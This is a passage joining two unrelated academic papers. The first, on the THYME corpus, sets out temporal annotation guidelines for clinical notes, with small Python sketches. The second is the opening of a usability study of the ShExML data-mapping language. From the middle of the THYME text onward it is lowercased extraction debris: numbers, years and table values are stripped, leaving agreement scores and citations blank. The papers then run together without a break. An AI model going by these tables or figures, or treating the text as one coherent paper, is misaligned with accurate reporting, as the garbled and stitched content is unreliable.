These hedged events are more real than a hypothetical diagnosis, and likely merit inclusion on a timeline as part of the diagnostic history, but they must not be conflated with confirmed fact. These (and other forms of uncertainty in the medical domain) are discussed extensively in Vincze et al. In contrast, GENERIC events do not refer to the patient's illness or treatment, but instead discuss illness or treatment in general (often in the patient's specific demographic). For example:

(4) In other patients without significant comorbidity that can tolerate adjuvant chemotherapy, there is a benefit to systemic adjuvant chemotherapy.

Such passages would be true if pasted into any patient's note, and are often identical chunks of text repeatedly used to justify a course of action or treatment, as well as to defend against liability.

Contextual aspect (so named to distinguish it from grammatical aspect) allows the clinically necessary category INTERMITTENT. This serves to distinguish intermittent events (such as vomiting or seizures) from constant, more stative events (such as fever or soreness). For example, the event in (5a) would be marked as INTERMITTENT, while that in (5b) would not:

(5a) She has been vomiting since June.
(5b) She has had swelling since June.

In the first case, we assume that her vomiting has been intermittent, i.e., there were several points since June at which she was not actively vomiting. In the second case, unless made otherwise explicit ("she has had occasional swelling"), we assume that the swelling was a constant state. This property is also used when a particular instance of an event is intermittent, even though it generally would not be:

(6) Since starting her new regime, she has had occasional bouts of fever, but is feeling much better.

The permanence attribute has two values, FINITE and PERMANENT. Permanence is a property of diseases themselves, roughly corresponding to the medical distinction between "chronic" and "acute" disease, and marks whether a disease is persistent following diagnosis. For example, a (currently) incurable disease like multiple sclerosis would be classed as PERMANENT, and thus, once mentioned in a patient's note, will be assumed to persist through the end of the patient's timeline. This contrasts with FINITE disorders like influenza or fever, which, if not mentioned in subsequent notes, should be considered cured and no longer belong on the patient's timeline. Because it requires domain-specific knowledge, permanence, although present in the specification, is not currently annotated; however, annotators are trained on the basic idea and told about its subsequent axiomatic assignment. The addition of this property to our schema is designed to relieve annotators of any obligation to express this inferred information in some other way.
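A minimal data model for the event attributes just described might look like the following sketch. The attribute and value names mirror the prose above, but the class itself (and the NONE default for contextual aspect) is an assumption for illustration, not the actual THYME annotation format.

```python
from dataclasses import dataclass

# Value sets mirror the guideline text above; the dataclass is illustrative only.
CONTEXTUAL_MODALITY = {"ACTUAL", "HYPOTHETICAL", "HEDGED", "GENERIC"}
CONTEXTUAL_ASPECT = {"NONE", "INTERMITTENT"}     # "NONE" is an assumed default label
PERMANENCE = {"FINITE", "PERMANENT"}             # assigned axiomatically, not annotated

@dataclass
class Event:
    span: str                           # single-word syntactic head of the event
    contextual_modality: str = "ACTUAL"
    contextual_aspect: str = "NONE"
    permanence: str = "FINITE"

vomiting = Event("vomiting", contextual_aspect="INTERMITTENT")
sclerosis = Event("sclerosis", permanence="PERMANENT")
print(vomiting)
print(sclerosis)
```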
TIMEX types

Temporal expressions (TIMEX3s) in the clinical domain function the same way as in the general linguistic community, with two notable exceptions. ISO-TimeML SETs (statements of frequency) occur quite frequently in the medical domain, particularly with regard to medications and treatments. Medication sections within notes often contain long lists of medications, each with a particular associated SET ("Claritin twice daily"), and further temporal specification is not uncommon (e.g., "three times per day at meals", "once a week at bedtime").

The second major change for the medical domain is a new type of TIMEX3 which we call PREPOSTEXP. This covers temporally complex terms like "preoperative", "postoperative", and "intraoperative". These temporal expressions designate a span of time bordered, usually only on one side, by the incorporated event (an operation, in the examples above). In many cases, the referent is clear:

(7) She underwent hemicolectomy last week, and had some postoperative bleeding.

Here we understand that "postoperative" refers to "the period of time following the hemicolectomy". In these cases, the PREPOSTEXP makes explicit a temporal link between the bleeding and the hemicolectomy. In other cases, no clear referent is present:

(8) Patient shows some post-procedure scarring.

In these situations, where no procedure is mentioned (or the reference is never explicitly resolved), we treat the PREPOSTEXP as a narrative container (see below), covering the span of time following the unnamed procedure.

Finally, it is worth noting that the process of normalizing these TIMEX3s is significantly more complex than in the general domain, because many temporal expressions are anchored not to dates or times, but to other events (whose dates are often not mentioned or not known by the physician). As we move towards a complete system, we are working to expand the ISO-TimeML approach to TIMEX3 normalization to allow some value to be assigned to a phrase like "in the months after her hemicolectomy" when no referent date is present. ISO-TimeML, in discussion with the relevant ISO technical committee, plans to provide a way to reference such TIMEX3s in a future release of the standard.
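A comparable sketch for clinical TIMEX3s, including the new PREPOSTEXP type, is shown below. The SET normalization shown (a value plus a freq) follows common TimeML practice but is an assumption here, as is the idea of recording an anchor event on a PREPOSTEXP; neither is prescribed by the guideline text above.

```python
from dataclasses import dataclass

# Illustrative sketch of clinical TIMEX3 annotations, including PREPOSTEXP.
@dataclass
class Timex:
    span: str
    timex_type: str          # e.g., DATE, TIME, DURATION, SET, PREPOSTEXP
    value: str = ""          # normalized value, where one can be computed
    freq: str = ""           # only meaningful for SETs
    anchor_event: str = ""   # only for PREPOSTEXPs with a resolvable referent

# "twice daily": a SET, normalized here in a common TimeML style (assumption).
twice_daily = Timex("twice daily", "SET", value="P1D", freq="2X")
# "postoperative": a PREPOSTEXP anchored to the surgery when the referent is clear.
postop = Timex("postoperative", "PREPOSTEXP", anchor_event="hemicolectomy")

print(twice_daily)
print(postop)
```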
for unguided, general-purpose annota- tion, the number of relations that could be annotated grows quadratically with the number of events and times, and the task quickly becomes unmanageable. there are, however, strategies that we can adopt to make this labeling task more tractable. temporal ordering relations in text are of three kinds: . relations between two events . relations between two times . relations between a time and an event. iso-timeml, as a formal specification of the tem- poral information conveyed in language, makes no distinction between these ordering types. humans, however, do make distinctions, based on local tempo- ral markers and the discourse relations established in a narrative (miltsakaki et al., ; poesio, ). because of the difficulty of humans capturing ev- ery relationship present in the note (and the disagree- ment which arises when annotators attempt to do so), it is vital that the annotation guidelines describe an approach that reduces the number of relations that must be considered, but still results in maximally in- formative temporal links. we have found that many of the weaknesses in prior annotation approaches stem from interaction between two competing goals: • the guideline should specify certain types of an- notations that should be performed; • the guideline should not force annotations to be performed when they need not be. failing in the first goal will result in under-annotation and the neglect of relations which provide necessary information for inference and analysis. failure in the second goal results in over-annotation, creating com- plex webs of temporal relations which yield mostly inferable information, but which complicate annota- tion and adjudication considerably. our method of addressing both goals in tempo- ral relations annotation is that of the narrative con- tainer, discussed in pustejovsky and stubbs ( ). a narrative container can be thought of as a temporal bucket into which an event or series of events may fall, or a natural cluster of events around a given time or situation. these narrative containers are often represented (or “anchored”) by dates or other temporal expressions (within which a variety of different events occur), although they can also be anchored to more abstract concepts (“recovery” which might involve a variety of events) or even durative events (many other events can occur dur- ing a surgery). rather than marking every possible tlink between each event, we instead try to link all events to their narrative containers, and then link those containers so that the contained events can be linked by inference. first, annotators assign each event to one of four broad narrative containers: before the doctime, be- fore and overlapping the doctime, just overlapping the doctime or after the doctime. this narrative container is identified by the event attribute doc- timerel. after the assignment of doctimerel, the remainder of the narrative container relations must be specified using temporal links (tlinks). there are five different temporal relations used for such tlinks: before, overlap, begins-on, ends-on and contains . due to our narrative container ap- proach, contains is the most frequent relation by a large margin. events serving as narrative container anchors are not tagged as containers per-se. 
instead, annotators use the narrative container idea to help them visu- alize the temporal relations within a document, and then make a series of contains tlink annotations which establish events and timex s as anchors, and specify their contents. if the annotators do their jobs correctly, properly implementing doctimerel and creating accurate tlinks, a good understanding of the narrative containers present in a document will naturally emerge from the annotated text. the major advantage introduced with narrative containers is this: a narrative event is placed within a bounding temporal interval which is explicitly men- tioned in the text. this allows events within sep- arate containers to be linked by post-hoc inference, temporal reasoning, and domain knowledge, rather than by explicit (and time-consuming) one-by-one temporal relations annotation. a secondary advantage is that this approach works nicely with the general structure of story-telling in both the general and clinical domains, and provides a compelling and useful metaphor for interpreting time- lines. often, especially in clinical histories, doctors will cluster discussions of symptoms, interventions and diagnoses around a given date (e.g. a whole para- graph starting “june :”), a specific hospitaliza- tion (“during her january stay at mercy”), or a given illness or treatment (“while she underwent chemo”). even when specific events are not explicitly or- dered within a cluster (often because the order can be easily inferred with domain knowledge), it is often quite easy to place the events into containers, and just a few tlinks can order the containers relative to one another with enough detail to create a clinically useful understanding of the overall timeline. narrative containers also allow the inference of re- lations between sub-events within nested containers: this is a subset of the iso-timeml tlink types, excluding those seldom occurring in medical records, like ‘simultaneous’ as well as inverse relations like ‘during’ or ‘after’. ( ) december th: the patient underwent an mri and ekg as well as emergency surgery. dur- ing the surgery, the patient experienced mild tachycardia, and she also bled significantly during the initial incision. . december th contains mri . december th contains ekg . december th contains surgery a. surgery contains tachycardia b. surgery contains incision c. incision contains bled through our container nesting, we can automatically infer that ‘bled’ occurred on december th (because ‘ th’ contains ‘surgery’ which contains ‘inci- sion’ which contains ‘bled’). this also allows the capture of event/sub-event relations, and the rapid expression of complex temporal interactions. explicit vs. inferable annotation given a specification language, there are essentially two ways of introducing the elements into the docu- ment (data source) being annotated: • manual annotation: elements are introduced into the document directly by the human annotator fol- lowing the guideline. • automatic (inferred) annotation: elements are cre- ated by applying an automated procedure that in- troduces new elements that are derivable from the human annotations. as such, there is a complex interaction between spec- ification and guideline, and we focus on how the clinical annotation task has helped shape and refine the annotation guidelines. 
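the second, automatic kind of element introduction can be as small as a closure pass over the links that humans did mark. a minimal sketch (python; illustrative only, with stand-in labels for the bolded events of the nested-container example above, and "december visit" standing in for the anchoring date) that propagates contains links through nested containers:

    def transitive_closure(links):
        """transitively close a set of (container, contained) contains pairs."""
        closed = set(links)
        changed = True
        while changed:
            changed = False
            for a, b in list(closed):
                for c, d in list(closed):
                    if b == c and (a, d) not in closed:
                        closed.add((a, d))
                        changed = True
        return closed

    annotated = {
        ("december visit", "mri"), ("december visit", "ekg"), ("december visit", "surgery"),
        ("surgery", "tachycardia"), ("surgery", "incision"), ("incision", "bled"),
    }
    inferred = transitive_closure(annotated) - annotated
    # inferred now holds, among others, ("surgery", "bled") and ("december visit", "bled")

the same idea applies to before links, and it is this derived set that the agreement computation described later operates over.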
it is important to note that an annotation guideline does not necessarily force the markup of certain elements in a text, even though the specification language (and the eventual goal of the project) might require those annotations to exist. in some cases, these added annotations are derived logically from human annotations. explicitly marked temporal relations can be used to infer others that are not marked but exist implicitly through closure. for instance, given events a, b and c and tlinks ‘a before b’ and ‘b before c’, the tlink ‘a be- fore c’ can be automatically inferred. repeatedly applying such inference rules allows all inferable we ignore the application of automatic techniques, such as classifiers trained on external datasets, as our focus here is on the preparation of the gold standard used for such classifiers. tlinks to be generated (verhagen, ). we can use this idea of closure to show our annotators which annotations need not be marked explicitly, saving time and effort. we have also incorporated these clo- sure rules into our inter-annotator agreement (iaa) calculation for temporal relations, described further in section . . the automatic application of rules following the annotation of the text is not limited to the marking of logically inferable relations or events. in the clinical domain, the combination of within-group shared knowledge and pressure towards concise writ- ing leads to a number of common, inferred relations. take, for example, the sentence: ( ) jan : colonoscopy, biopsies. pathology showed adenocarcinoma, resected at mercy. diagnosis t n adenocarcinoma. in this sentence, only the contains relations be- tween “jan ” and the events (in bold) are explicitly stated. however, based on the known progression-of-care for colon cancer, we can infer that the colonoscopy occurs first, biopsies occur dur- ing the colonoscopy, pathology happens afterwards, a diagnosis (here, adenocarcinoma) is returned after pathology, and resection of the tumor occurs after diagnosis. the presence of the ajcc staging infor- mation in the final sentence (along with the confir- mation of the adenocarcinoma diagnosis) implies a post-surgical pathology exam of the resected spec- imen, as the ajcc staging information cannot be determined without this additional examination. these inferences come naturally to domain ex- perts but are largely inaccessible to people outside the medical community without considerable anno- tator training. making explicit our understanding of these “understood orderings” is crucial; although they are not marked by human annotators in our schema, the annotators often found it initially frustrating to leave these (purely inferential) relations unstated. al- though many of our (primarily linguistically trained) annotators learned to see these patterns, we chose to exclude them from the manual task since newer an- notators with varying degrees of domain knowledge may struggle if asked to manually annotate them. similar unspoken-but-understood orderings are found throughout the clinical domain. as mentioned in section , both permanence and contextual as- pect:intermittent are properties of symptoms and dis- eases themselves, rather than of the patient’s particu- lar situation. as such, these properties could easily annotation type raw count event , timex , link total , table : raw frequency of annotation types tlink type raw count % of tlinks contains , . % overlap , . % before , . % begins-on . % ends-on . % total , . 
% table : relative frequency of tlink types be identified and marked across a medical ontology, and then be automatically assigned to events rec- ognized as specific medical named entities. finally, due to the peculiarities of ehr systems, some annotations must be done programatically. ex- act dates of patient visit (or of pathology/radiology consult) are often recorded as metadata on the ehr itself, rather than within the text, making the canoni- cal doctime (or time of automatic section modifi- cations) difficult to access in de-identified plaintext data, but easy to find automatically. results we report results on the annotations from the here- released subset of the thyme colon cancer corpus, which includes clinical notes and pathology reports for patients diagnosed with colon cancer for a total of documents. each note was annotated by a pair of graduate or undergraduate students in linguistics at the university of colorado, then adju- dicated by a domain expert. these clinical narratives were sampled from the ehrs of a major healthcare center (the mayo clinic). they were deidentified for all patient-sensitive information; however, original dates were retained. . descriptive statistics table presents the raw counts for events, temporal expressions and links in the adjudicated gold anno- tations. table presents the number and percentage of tlinks by type in the adjudicated relations gold annotations. annotation type f -score alpha event . . timex . . link: participants only . . link: participants+type . . link: contains . . table : iaa (f -score and alpha) by annotation type event property f -score alpha doctimerel . . cont.aspect . . cont.modality . . table : iaa (f -score and alpha) for event properties . inter-annotator agreement we report inter-annotator agreement (iaa) results on the thyme corpus. each note was annotated by two independent annotators. the final gold standard was produced after disagreement adjudication by a third annotator was performed. we computed the iaa as f -score and krippen- dorff’s alpha (krippendorff, ) by applying clo- sure, using explicitly marked temporal relations to identify others that are not marked but exist implicitly. in the computation of the iaa, inferred-only tlinks do not contribute to the score, matched or unmatched. for instance, if both annotators mark a before b and b before c, to prevent artificially inflating the agreement score, the inferred a before c is ignored. likewise, if one annotator marked a before b and b before c and the other annotator did not, the inferred a before c is not counted. however, if one annotator did explicitly mark a before c, then an equivalent inferred tlink would be used to match it. event and timex iaa was generated based on exact and overlapping spans, respectively. these results are reported in table . the thyme corpus also differs from iso- timeml in terms of event properties, with the addition of doctimerel, contextualmodality and contextualaspect. iaa for these properties is in table . . baseline systems to get an idea of how much work will be neces- sary to adapt existing temporal information extrac- tion systems to the clinical domain, we took the freely available cleartk-timeml system (bethard, ), tempeval thyme corpus p r f p r f timex . . . . . . event . . . . . . doctimerel - - - . . . link . . . . . . event-timex - - - . . . event-event - - - . . . table : performance of cleartk-timeml models, as reported in the tempeval competition, and as applied to the thyme corpus development set. 
which was among the top performing systems in tempeval (uzzaman et al., ), and eval- uated its performance on the thyme corpus. cleartk-timeml uses support vector machine classifiers trained on the tempeval training data, employing a small set of features including character patterns, tokens, stems, part-of-speech tags, nearby nodes in the constituency tree, and a small time word gazetteer. for events and timex s, the cleartk-timeml system could be applied di- rectly to the thyme corpus. for doctimerels, the relation for an event was taken from the tlink between that event and the document creation time, after mapping includes to overlap. events with no such tlink were assumed to have a doc- timerel of overlap. for other temporal relations, includes was mapped to contains. results of this system on tempeval and the thyme corpus are shown in table . for time ex- pressions, performance when moving to the clinical data degrades about %, from f of . to . . for events, the degradation is much larger, about %, from . to . , most likely because of the large number of clinical symptoms, diseases, disor- ders, etc. which have never been observed by the system during training. temporal relations are a bit more difficult to compare because tempeval lumped doctimerel and other temporal relations together and had several differences in their evaluation met- ric . however, we at least can see that performance of the cleartk-timeml system on temporal rela- tions is low on clinical text, achieving only f of . . these results suggest that clinical narratives do the tempeval evaluation metric penalized systems for parts of the text that were not examined by annotators, and used different variants of closure-based precision and recall. indeed present new challenges for temporal informa- tion extraction systems, and that having access to domain specific training data will be crucial for ac- curate extraction in the clinical domain. at the same time, it is encouraging that we were able to apply existing iso-timeml-based systems to our corpus, despite the several extensions to iso-timeml that were necessary for clinical narratives. discussion contains plays a large role in the thyme cor- pus, representing % of tlink annotations made, compared with only . % for overlap, the second most frequent type. we also see that before links are relatively less common than overlap and con- tains, illustrating that much of the temporal ordering on the timeline is accomplished by using many ver- tical links (contains, overlap) to build contain- ers, and few horizontal links (before, begins-on, ends-on) to order them. iaa on events and temporal expressions is strong, although differentiating implicit events (which should not be marked) from explicit, mark- able events remains one of the biggest sources of disagreement. when compared to the data from the i b challenge (sun et al., b), our iaa figures are quite similar. even with our more com- plex schema, we achieved an f -score of . for events (compared to the i b score of . for par- tial match). for timex s, our f -score was . , compared to an f -score of . for i b . tlinking medical events remains a very diffi- cult task. by using our narrative container approach to constrain the number of necessary annotations and by eliminating often-confusing inverse relations (like ‘after’ and ‘during’) (neither of which were done for the i b data), we were able to significantly improve on the i b tlink span agreement f -score of . , achieving an agreement score of . 
for all links across our corpus. the majority of remaining an- notator disagreement comes from different opinions about whether any two events require an explicit tlink between them or an inferred one, rather than what type of tlink it would be (e.g. before vs. contains). although our results are still signifi- cantly higher than the results reported for i b , and in line with previously reported general news figures, we are not satisfied. improving iaa is an important goal for future work, and with further training, speci- fication, experience, and standardization, we hope to clarify contexts for explicit tlinks. news-trained temporal information extraction sys- tems see a significant drop in performance when ap- plied to the clinical texts of the thyme corpus. but as the corpus is an extension of iso-timeml, future work will be able to train iso-timeml compliant systems on the annotations of the thyme corpus to reduce or eliminate this performance gap. some applications that our work may enable in- clude ( ) better understanding of event semantics, such as whether a disease is chronic or acute and its usual natural history, ( ) typical event duration for these events, ( ) the interaction of general and domain-specific events and their importance in the fi- nal timeline, and, more generally, ( ) the importance of rough temporality and narrative containers as a step towards finer-grained timelines. we have several avenues of ongoing and future work. first, we are working to demonstrate the utility of the thyme corpus for training machine learning models. we have designed support vector machine models with constituency tree kernels that were able to reach an f -score of . on an event-timex narrative container identification task (miller et al., ), and we are working on training models to identify events, times and the remaining types of temporal relations. second, as per our motivating use cases, we are working to integrate this annotation data with timeline visualization tools and to use these annotations in quality-of-care research. for example, we are using temporal reasoning built on this work to investigate the liver toxicity of methotrexate across a large corpus of ehrs (lin et al., under review)]. finally, we plan to explore the application of our notion of an event (anything that should be visible on a domain-appropriate timeline) to other domains. it should transfer naturally to clinical notes about other (non-cancer) conditions, and even to other types of clinical notes, as certain basic events should always be included in a patient’s timeline. applying our notion of event to more distant domains, such as legal opinions, would require first identifying a consensus within the domain about which events must appear on a timeline. conclusion much of the information in clinical notes critical to the construction of a detailed timeline is left implicit by the concise shorthand used by doctors. many events are referred to only by a term such as “tu- mor”, while properties of the event itself, such as “intermittent”, may not be specified. in addition, the ordering of events on a timeline is often left to the reader to infer, based on domain-specific knowledge. it is incumbent upon the annotation guideline to in- dicate that only informative event orderings should be annotated, while leaving domain-specific order- ings to post-annotation inference. 
this document has detailed our approach to adapting the existing iso-timeml standard to this recovery of implicit information, and defining guidelines that support an- notation within this complex domain. our guide- lines, as well as the annotated data, are available at http://thyme.healthnlp.org, and the full corpus has been proposed for use in a semeval shared task. acknowledgments the project described is supported by grant num- ber r lm and u lm from the na- tional library of medicine. the content is solely the responsibility of the authors and does not necessarily represent the official views of the national library of medicine or the national institutes of health. we would also like to thank dr. piet c. de groen and dr. brad erickson at the mayo clinic, as well as dr. william f. styler iii, for their contributions to the schema and to our understanding of the intricacies of clinical language. references james f allen. . maintaining knowledge about temporal intervals. communications of the acm, ( ): – . emmon bach. . the algebra of events. linguistics and philosophy, ( ): – . steven bethard. . cleartk-timeml: a minimalist ap- proach to tempeval . in second joint conference on lexical and computational semantics (*sem), vol- ume : proceedings of the seventh international work- shop on semantic evaluation (semeval ), pages – , atlanta, georgia, usa, june. association for computational linguistics. olivier bodenreider. . the unified medical language system (umls): integrating biomedical terminology. nucleic acids research, (database issue):d –d , january. philip bramsen, pawan deshpande, yoong keok lee, and regina barzilay. . finding temporal order in discharge summaries. in amia annual symposium proceedings, volume , page . american medical informatics association. carlo combi, yuval shahar, et al. . temporal reason- ing and temporal data maintenance in medicine: issues and challenges. computers in biology and medicine, ( ): – . robert h dolin. . modeling the temporal complex- ities of symptoms. journal of the american medical informatics association, ( ): – . george hripcsak, nicholas d soulakis, li li, frances p morrison, albert m lai, carol friedman, neil s cal- man, and farzad mostashari. . syndromic surveil- lance using ambulatory electronic health records. jour- nal of the american medical informatics association, ( ): – . ann k irvine, stephanie w haas, and tessa sullivan. . tn-ties: a system for extracting temporal infor- mation from emergency department triage notes. in amia annual symposium proceedings, volume , page . american medical informatics association. elpida t keravnou. . temporal abstraction of med- ical data: deriving periodicity. in intelligent data analysis in medicine and pharmacology, pages – . springer. klaus h. krippendorff. . content analysis: an introduction to its methodology. sage publications, inc, third edition edition, april. chen lin, elizabeth karlson, dmitriy dligach, mon- ica ramirez, timothy miller, huan mo, natalie braggs, andrew cagan, joshua denny, and guer- gana. savova. under review. automatic identification of methotrexade-induced liver toxicity in rheumatoid arthritis patients from the electronic medical records. journal of the medical informatics association. john mccarthy. . actions and other events in sit- uation calculus. in proceedings of the international conference on principles of knowledge representation and reasoning, pages – . morgan kaufmann publishers; . 
stéphane m meystre, guergana k savova, karin c kipper- schuler, john f hurdle, et al. . extracting infor- mation from textual documents in the electronic health record: a review of recent research. yearb med inform, : – . timothy miller, steven bethard, dmitriy dligach, sameer pradhan, chen lin, and guergana savova. . dis- covering temporal narrative containers in clinical text. in proceedings of the workshop on biomedical natural langua ge processing, pages – , sofia, bulgaria, august. association for computational lin- guistics. eleni miltsakaki, rashmi prasad, aravind joshi, and bon- nie webber. . the penn discourse treebank. in in proceedings of lrec . massimo poesio. . discourse annotation and seman- tic annotation in the gnome corpus. in in proceedings of the acl workshop on discourse annotation. james pustejovsky and amber stubbs. . increasing informativeness in temporal annotation. in proceedings of the th linguistic annotation workshop, pages – . association for computational linguistics. james pustejovsky, robert knippen, jessica littman, and roser sauri. . temporal and event information in natural language text. language resources and evalu- ation, ( - ): – . james pustejovsky, kiyong lee, harry bunt, and laurent romary. . iso-timeml: an international standard for semantic annotation. in proceedings of the seventh international conference on language resources and evaluation (lrec ), valletta, malta. angus roberts, robert gaizauskas, mark hepple, george demetriou, yikun guo, and ian roberts. . build- ing a semantically annotated corpus of clinical texts. journal of biomedical informatics, ( ): – . guergana savova, steven bethard, will styler, james mar- tin, martha palmer, james masanz, and wayne ward. . towards temporal relation discovery from the clinical narrative. in amia annual symposium pro- ceedings, volume , page . american medical informatics association. tessa sullivan, ann irvine, and stephanie w haas. . it’s all relative: usage of relative temporal expressions in triage notes. proceedings of the american society for information science and technology, ( ): – . weiyi sun, anna rumshisky, and ozlem uzuner. a. evaluating temporal relations in clinical text: i b challenge. journal of the american medical informat- ics association. weiyi sun, anna rumshisky, and ozlem uzuner. b. evaluating temporal relations in clinical text: i b challenge. journal of the american medical informat- ics association, ( ): – . alexander turchin, maria shubina, eugene breydo, merri l pendergrass, and jonathan s einbinder. . comparison of information content of structured and narrative text data sources on the example of medica- tion intensification. journal of the american medical informatics association, ( ): – . naushad uzzaman, hector llorens, leon derczynski, james allen, marc verhagen, and james pustejovsky. . semeval- task : tempeval- : evaluating time expressions, events, and temporal relations. in sec- ond joint conference on lexical and computational semantics (*sem), volume : proceedings of the sev- enth international workshop on semantic evaluation (semeval ), pages – , atlanta, georgia, usa, june. association for computational linguistics. marc verhagen. . temporal closure in an annota- tion environment. language resources and evalua- tion, ( ): – . veronika vincze, gyrgy szarvas, richrd farkas, gyrgy mra, and jnos csirik. . the bioscope corpus: biomedical texts annotated for uncertainty, negation and their scopes. bmc bioinformatics, (suppl ): – . 
ying zhao, george karypis, and usama m. fayyad. . hierarchical clustering algorithms for docu- ment datasets. data mining and knowledge discovery, : – . jiaping zheng, wendy w chapman, rebecca s crowley, and guergana k savova. . coreference resolution: a review of general methodologies and applications in the clinical domain. journal of biomedical informatics, ( ): – . li zhou, simon parsons, and george hripcsak. . the evaluation of a temporal reasoning system in processing clinical discharge summaries. journal of the american medical informatics association, ( ): – . submitted may accepted october published november corresponding author herminio garcía-gonzález, garciaher- minio@uniovi.es academic editor james procter additional information and declarations can be found on page doi . /peerj-cs. copyright garcía-gonzález et al. distributed under creative commons cc-by . open access shexml: improving the usability of heterogeneous data mapping languages for first-time users herminio garcía-gonzález , iovka boneva , sławek staworko , josé emilio labra-gayo and juan manuel cueva lovelle deparment of computer science, university of oviedo, oviedo, asturias, spain university of lille, inria, lille, nord-pas-de-calais, france abstract integration of heterogeneous data sources in a single representation is an active field with many different tools and techniques. in the case of text-based approaches— those that base the definition of the mappings and the integration on a dsl—there is a lack of usability studies. in this work we have conducted a usability experiment (n= ) on three different languages: shexml (our own language), yarrrml and sparql-generate. results show that shexml users tend to perform better than those of yarrrml and sparql-generate. this study sheds light on usability aspects of these languages design and remarks some aspects of improvement. subjects human-computer interaction, artificial intelligence, world wide web and web science, programming languages keywords data integration, data mapping, shexml, yarrrml, usability, sparql-generate introduction data integration is the problem of mapping data from different sources so that they can be used through a single interface (halevy, ). in particular, data exchange is the process of transforming source data to a target data model, so that it can be integrated in existing applications (fagin et al., ). modern data exchange solutions require from the user to define a mapping from the source data model to the target data model, which is then used by the system to perform the actual data transformation. this process is crucial to many applications nowadays as the number of heterogeneous data sources is growing (reinsel, gantz & rydning, ). although many technologies have appeared through the years, the emergence of the semantic web (berners-lee, hendler & lassila, ) offered new perspectives for data integration. the semantic web principle recommends to represent entities through a unique internationalized resource identifier (iri) which allows creation of implicit links between distinct datasets simply by reusing existing iris. moreover, the resource description framework (rdf), which is the advocated data format for the semantic web, is compositional, meaning that one can simply fuse data sources without the use of a specific merger. these characteristics make rdf a privileged format for data integration and thus a target for data exchange and transformation. 
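this compositionality is easy to see in practice: two independently produced graphs that reuse the same iri can be merged by simply reading them into one graph. the following sketch (python with the rdflib library; the iri and property names are invented for illustration) fuses two tiny descriptions of the same resource without any dedicated merger:

    from rdflib import Graph

    source_a = """@prefix ex: <http://example.com/> .
    ex:film1 ex:name "inception" ."""

    source_b = """@prefix ex: <http://example.com/> .
    ex:film1 ex:director "christopher nolan" ."""

    merged = Graph()
    merged.parse(data=source_a, format="turtle")  # triples simply accumulate in the same graph
    merged.parse(data=source_b, format="turtle")
    print(len(merged))  # 2 triples, both describing ex:film1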
the most notable example of an rdf-based data integration system is wikidata (https://www.wikidata.org/), where multiple contributors (humans or robots) transform data from different sources and integrate it into the wikidata data store. another example is the data.bnf.fr project, which exposes the catalog of the french national library (bnf) in rdf format by interlinking it with other datasets around the world (see https://data.bnf.fr/en/about for more information on the project). initially, the only way to perform these data transformations was to use ad-hoc scripts designed to take one data source and transform it to an rdf output. this required the creation of a dedicated script for every new input data source that needed to be converted; such solutions are slow and costly to develop. later on, domain-specific language (dsl) approaches emerged which are able to define a translation in a declarative fashion instead of an imperative one. this technique lowers the development time, but a script for every different data source is still needed, which can be a maintenance issue. more recent systems allow direct transformation of multiple data sources into a single representation. some of them provide dedicated dsls in which a single script defines the multi-source transformation, others provide graphical interfaces. this is an improvement compared to previous techniques as in principle it allows for faster development and improved maintainability (meester et al., ). however, the adoption of such systems depends also on their usability (hanenberg, ). with usability in mind we have designed the shexml (garcía-gonzález, fernández-Álvarez & gayo, ) language, which allows transformation and integration of data from xml and json sources into a single rdf output. shexml uses shape expressions (shex) (prud'hommeaux, labra gayo & solbrig, ) for defining the desired structure of the output. shexml has a text-based syntax (in contrast to graphical tools) and is intended for users who prefer this kind of representation. our hypothesis is that for first-time users with some programming and linked data background, data integration is performed more easily using shexml than using one of the existing alternatives. the consequent research questions that we study in the current paper are:
• rq : is shexml more usable for first-time users than other languages?
• rq : if true, can a relation be established between feature support and usability for first-time users?
• rq : which parts of shexml, and of other languages, can be improved to increase usability?
in this work we focus on the usability of tools based on a dsl and on how the design of the language affects usability and associated measures such as development time and learning curve.
the rest of the paper is structured as follows: ‘background’ studies the related work, in ‘presentation of the languages under study’ the three languages are compared alongside a features comparison between them, in ‘methodology’ we describe the methodology followed in the study, in ‘results’ the results are presented along with their statistical analysis. in ‘discussion’ we discuss and interpret the results and in ‘conclusions and future work’ we draw some conclusions and propose some future lines from this work. garcía-gonzález et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://data.bnf.fr/en/about https://peerj.com https://www.wikidata.org/ http://dx.doi.org/ . /peerj-cs. background we first review available tools and systems for generating rdf from different systems for data representation. these can be divided into one-to-one and many-to-one transformations. we also survey existing studies on the effectiveness of heterogeneous data mapping tools. one to one transformations much research work has been done in this topic where conversions and technologies were proposed to transform from a structured format (e.g., xml, json, csv, databases, etc.) to rdf. from xml to rdf in xml ecosystem many conversions and tools have been proposed: miletic et al. ( ) describe their experience with the transformation of rdf to xml (and vice versa) and from xml schema to rdf schema. deursen et al. ( ) propose a transformation from xml to rdf which is based on an ontology and a mapping document. an approach to convert xml to rdf using xml schema is reported by battle ( ) and battle ( ). thuy et al. ( ) describe how they perform a translation from xml to rdf using a matching between xml schema and rdf schema. the same procedure was firstly proved with a matching between dtd and rdf schema by the same authors in (thuy et al., ). breitling ( ) reports a technique for the transformation between xml and rdf by means of the xslt technology which is applied to astronomy data. another approach that uses xslt attached to schemata definitions is described by sperberg-mcqueen & miller ( ). however, use of xslt for lifting purposes tends to end up in complex and non flexible stylesheets. thus, bischof et al. ( ) present xsparql, a framework that enables the transformation between xml and rdf by using xquery and sparql to overcome the drawbacks of using xslt for these transformations. from json to rdf although in the json ecosystem there are less proposed conversions and tools, there are some works that should be mentioned. müller et al. ( ) present a transformation of a restful api serving interlinked json documents to rdf for sensor data. an rdf production methodology from json data tested on the greek open data repository is presented by theocharis & tsihrintzis ( ). freire, freire & souza ( ) report a tool able to identify json metadata, align them with vocabulary and convert it to rdf; in addition, they identify the most appropriate entity type for the json objects. from tabular form to rdf the importance of csv (along with its spreadsheet counterparts) has influenced work in this ecosystem: ermilov, auer & stadler ( ) present a mapping language whose processor is able to convert from tabular data to rdf. a tool for translating spreadsheets to rdf without the assumption of identical vocabulary per row is described by han et al. ( ). fiorelli et garcía-gonzález et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. al. 
